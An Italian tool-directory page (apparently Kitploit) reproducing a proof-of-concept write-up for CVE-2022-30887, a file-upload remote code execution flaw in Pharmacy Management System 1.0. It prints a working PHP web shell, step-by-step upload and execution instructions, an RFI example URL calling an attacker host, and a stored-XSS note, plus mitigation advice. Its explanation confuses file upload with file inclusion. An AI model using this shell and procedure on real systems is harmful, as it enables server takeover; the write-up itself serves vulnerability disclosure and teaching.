Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-30887 | Kitploit
Strumenti/GitHubGitHub/sonerctnkya/cve-2022-30887
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubsonerctnkya/cve-2022-30887

CVE-2022-30887

Vedi Repository
24 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-30887

Pharmacy Management System 1.0 Caricamento Shell

Questa applicazione è stata realizzata da Mayurik Il progetto del sistema di gestione farmaceutica in PHP è stato sviluppato per migliorare l'accuratezza e l'efficienza dei negozi farmaceutici attraverso la sicurezza e la gestione. In breve, è un'applicazione di inventario dei prodotti.

È stato scoperto che Pharmacy Management System v1.0 contiene una vulnerabilità di esecuzione di codice remoto (RCE) tramite il componente "/php_action/editProductImage.php". Questa vulnerabilità consente agli aggressori di eseguire codice arbitrario tramite un file immagine appositamente predisposto.

Cos'è un Attacco di File Inclusion

Le vulnerabilità di File Upload sono di solito una vulnerabilità che permette l'esecuzione di uno script. Funziona quando carichiamo il file sul server e inseriamo un comando sul file caricato. Le vulnerabilità di file upload sono divise in due tipi:

  • LFI (Inclusione Locale di File)
  • RFI (Inclusione Remota di File)

LFI (Inclusione Locale di File)

Questa vulnerabilità si verifica quando i file locali sul server includono il file recuperato dall'utente. I valori ricevuti dall'utente devono essere sterilizzati.

Esempio di LFI (Inclusione Locale di File) ;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>

RFI (Inclusione Remota di File)

Questa vulnerabilità funziona quando l'aggressore carica malware da un server remoto.

Esempio di RFI (Inclusione Remota di File) ;

"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

Spiegazione dell'exploit, PoC

  • Prima, dopo la pagina di login, verremo reindirizzati a "dashboar.php"
  • In secondo luogo, per andare alla pagina in cui è stata trovata la vulnerabilità, clicca su medicine nel menu, dopo aver cliccato su gestisci medicine verrai reindirizzato a "product.php" e clicca su modifica immagine sotto la scheda azioni

Product

  • Nella pagina "editproduct.php", clicca sul pulsante seleziona foto e carica il tuo script shell.

Esempio di script shell php;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>
  • Clicca sul pulsante salva e cattura la richiesta con burp suite

Richiesta;

Request

Risposta;

Response

  • Il file viene scaricato nella cartella "/assets/myimage/"
  • Effettua una richiesta per eseguire il tuo script nell'URL che è /assets/myimage/shell.php?s=echo+%22MuallimNaci%22

Richiesta;

Request

Risposta;

Response

Response

  • E BOOM

Inoltre, questa vulnerabilità è ancora attiva nell'applicazione.

Mitigazione

  • assicurati di accettare solo caratteri come "a-Z0-9" e di non consentire ".." o "/" o "%00" (byte nullo)
  • Assicurati che il "flag allow_url_include" sia disattivato
  • Secondo la Remediation OWASP 10: "L'applicazione può mantenere una whitelist di file, che possono essere inclusi dalla pagina, e quindi usare un identificatore (ad esempio il numero indice) per accedere al file selezionato. Qualsiasi richiesta contenente un identificatore non valido deve essere respinta, in questo modo non c'è superficie di attacco per utenti malintenzionati per manipolare il percorso"

Extra

Nella stessa pagina, "editproduct.php", ho trovato una XSS persistente

  • Il codice che include la vulnerabilità è;
root@kitploit:~
$sql = "UPDATE product SET product_name = '$productName'

In questo blocco di codice puoi uscire dal contesto con le virgolette doppie (")

Richiesta;

Request

Risposta;

Response

Response

Conclusione

Spero di essere riuscito a spiegare come funziona la vulnerabilità di file inclusion, quali situazioni la innescano e come prevenire questo attacco da parte degli aggressori. Grazie per il vostro prezioso tempo.

Scarica lo strumento